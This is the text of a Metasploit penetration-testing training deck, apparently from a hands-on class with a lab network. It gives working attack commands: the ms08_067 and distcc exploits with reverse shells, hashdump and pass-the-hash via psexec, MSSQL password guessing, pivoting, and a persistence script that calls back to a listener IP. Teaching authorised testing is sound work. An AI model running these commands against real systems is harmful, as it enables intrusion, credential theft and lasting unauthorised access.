Penetration Testing with Metasploit

Georgia Weidman

Acknowledgements

• Metasploit Team

• Offensive Security/Metasploit Unleashed

• Hackers for Charity

• David Kennedy

• BSides Delaware Crew

• Darren

Agenda

• Metasploit Basics

– Some terminology/brief intro to pentesting

– How Metasploit works

– Interacting with Metasploit

• Basic Exploitation

– Exploiting a vulnerability using Metasploit console

• Using Meterpreter

– Using the Meterpreter shell for post exploitation

Agenda

• Metasploit in a penetration test

– Information Gathering

– Vulnerability Scanning

– Exploitation in depth

– Post exploitation

– Reporting

• Hack some stuff

– Pop my boxes

Connecting

Wireless access point SSID IgnatiusRiley

Password: metasploit

What’s in the lab?

• Windows XP SP2

– IP address: 192.168.20.22

• Ubuntu Linux 8.04 (Metasploitable)

– IP address: 192.168.20.23

Others below .100 (.100 and above are you guys)

What is Penetration Testing?

Simulation of a real attack

Get out of jail free card for exploiting systems

Report to customers with findings and recommendations

Find and remediate vulnerabilities before attackers exploit them

What is Metasploit?

Exploitation framework

Ruby based

Modular

Exploits, payloads, auxiliaries, and more

Metasploit Terminology

Exploit: vector for penetrating the system

Payload: shellcode, what you want the exploit to do

Encoders: encode or mangle payload

Auxiliary: other modules besides exploitation

Session: connection from a successful exploit

Metasploit Interfaces

Msfconsole

Msfcli

Msfweb, Msfgui (discontinued)

Metasploit Pro, Metasploit Express

Armitage

Exploitation Streamlining

• Traditional Pentest: – Find public exploit

– Change offsets and return address for your target

– Replace shellcode

• Metasploit: – Load Metasploit module

– Select target OS

– Set IP addresses

– Select payload

Using Msfconsole: Exploitation

use <module> - sets exploit/auxillary/etc. to use

set <x X> - set a parameter

setg <x X> - set a parameter globally

show <x> - lists all available x

exploit – runs the selected module

Windows Exploitation Example

search windows/smb info windows/smb/ms08_067_netapi use windows/smb/ms08_067_netapi show payloads set payload windows/meterpreter/reverse_tcp show options set lhost 192.168.20.22 (set other options as well) exploit

MSFcli Exploitation Example

./msfcli <exploit> <option=x> E

Example: msfcli windows/smb/ms08_067_netapi

RHOST=192.168.1.2 LHOST=192.168.1.3

PAYLOAD=windows/shell/bind_tcp E

E = exploit

O = show options

P = show payloads

Linux Exploitation Example

search distcc

use unix/misc/distcc_exec

show payloads

set payload cmd/unix/reverse

show options

set rhost 192.168.20.23

set lhost 192.168.20.102 (your ip)

exploit

Sessions

sessions -l lists all active sessions

Sessions –i <id> interact with a given session

Meterpreter

Gain a session using a meterpreter payload

Memory based/never hits the disk

Everything a shell can do plus extra

Meterpreter Commands

help – shows all available commands

background – backgrounds the session

ps – shows all processes

migrate <process id>– moves meterpreter to

another process

getuid – shows the user

Meterpreter Commands

download <file> - pulls a file from the victim

upload <file on attacker> <file on victim> - pushes a file to the victim

hashdump – dumps the hashes from the sam

shell – drops you in a shell

Exercise

In Msfconsole use ms08_067_netapi to get a reverse meterpreter shell on the Windows XP machine.

Experiment with different payloads and meterpreter commands.

Information Gathering

Learning as much about a target as possible

Examples: open ports, running services, installed software

Identify points for further exploration

Metasploit and Databases

Metasploit supports MySQL and PostgreSQL

/etc/init.d/postgresql-8.4 start (starts PostgeSQL)

msf > db_connect

postgres:password@127.0.0.1/metasploit (connects to database server and creates database metasploit)

Portscanning

Queries a host to see if a program is listening

Ex: Browsing to a website – webserver listens on port 80

Listening ports are accessible by an attacker and if vulnerable may be used for exploitation

Ex: ms08_067_netapi exploits smb on port 445

Metasploit and nmap

Port scanning and just about everything else

http://nmap.org/ man nmap

Ex: nmap -sV 192.168.20.20-99 -oA subnet1 (TCP version scan, all hosts 192.168.20.X, outputs multiple formats beginning with subnet1)

msf > db_import subnet1.xml

MSF Axillary Portscanners

msf > search portscan (shows portscan modules)

scanner/portscan/tcp (runs a TCP syn scan)

Use auxiliary modules like exploits (use, set,

exploit, etc.)

Some Other MSF Scanners

scanner/smb/smb_version (scans port 445 for the smb version, good way to get OS version)

scanner/ssh/ssh_version (queries the ssh version)

scanner/ftp/anonymous (anonymous ftp login)

Vulnerability Scanning

Query systems for potential vulnerabilities

Identify potential methods of penetration

Ex: SMB version scan in information gathering

returned port 445 open and target Windows XP SP2, scan for ms08_067_netapi vulnerability

Metasploit and Nessus

Tenable's Vulnerability Scanner (http://www.nessus.org)

msf>load nessus

msf > nessus_connect student1:password@192.168.20.103 ok (ok says no ssl is ok)

msf > nessus_policy_list

msf > nessus_scan_new -4 pwnage <ip range> (scan using policy one, name it pwnage)

msf> nessus_report_list

msf> nessus_report_get <report id>

Metasploit Vulnerability Scanners

SMB Login

Given a set of credentials what systems can they access?

scanner/smb/smb_login

Open VNC and X11

If misconfigured may be accessible without credentials

scanner/vnc/vnc_none_auth

scanner/x11/open_x11

Using Msfconsole: Exploitation

use <module> - sets exploit/auxillary/etc. to use

set <x X> - set a parameter

setg <x X> - set a parameter globally

show <x> - lists all available x

exploit – runs the selected module

Our Database

hosts

services

vulns

-c select columns

-s search for specific string

db_autopwn

By default just runs all the exploits that match a given open port

Not stealthy

Using vulnerability data can be made smarter, matches vulnerabilities instead of ports

db_autopwn -x -e

Attacking MSSQL

MSSQL TCP port can change, UDP port is 1434

msf> search mssql (shows all mssql modules)

msf> use scanner/mssql/mssql_ping (queries UDP 1434 for information including TCP port)

msf> use scanner/mssql/mssql_login (tries passwords to log into mssql)

msf> use windows/mssql/mssql_payload (logs into mssql and gets a shell

We have a shell, now what?

Privilege escalation

Local information gathering

Exploiting additional hosts

Maintaining access

Forensic avoidance

Meterpreter: Privilege Escalation

A session has the privileges of the exploited process

getuid (tells you what user your session is running as)

getsystem (tries various techniques to escalate privileges)

Meterpreter: Enabling Remote Desktop

Turn on remote desktop, get it through the firewall, put a user in the remote desktop users group

run getgui –e

Meterpreter: Migrating

If the process that hosts meterpreter closes meterpreter dies too

Example: client side exploit residing in the browser

meterpreter> ps (shows all processes)

meterpreter> migrate <process id> (moves to a new process)

Meterpreter: Searching for Content

Look for specific interesting files on the exploited system

search -h

Example: search -f *.jpg (finds all the porn)

Pivoting

Scenario: Exploit a dual networked host, with a

routeable interface and non routable one. Can we

attack other hosts on the non routeable interface

without SSH tunneling?

Route add 10.0.0.0/24 1 (routes traffic to the subnet through session 1)

Now you can portscan, exploit, etc. the non routable subnet

PSExec

hashdump (dumps the hashes, not always easy to crack)

Why not just pass the hash to other systems?

use windows/smb/psexec

set SMBPass to the hash

Meterpreter: Persistence

Persistence script installs a meterpreter service

Meterpreter comes back when the box restarts

Ex: run persistence -U -i 5 -p 443 –r 192.168.20.101 (respawns on login, at a 5 second interval on port 443 to ip 192.168.20.101)

Exercises

Perform a penetration test on the Windows and Linux systems we used in class

Perform a penetration test on the lab network

Contact

Georgia Weidman

Website: http://www.grmn00bs.com

http://www.georgiaweidman.com

Email: georgia@grmn00bs.com

Twitter: @vincentkadmon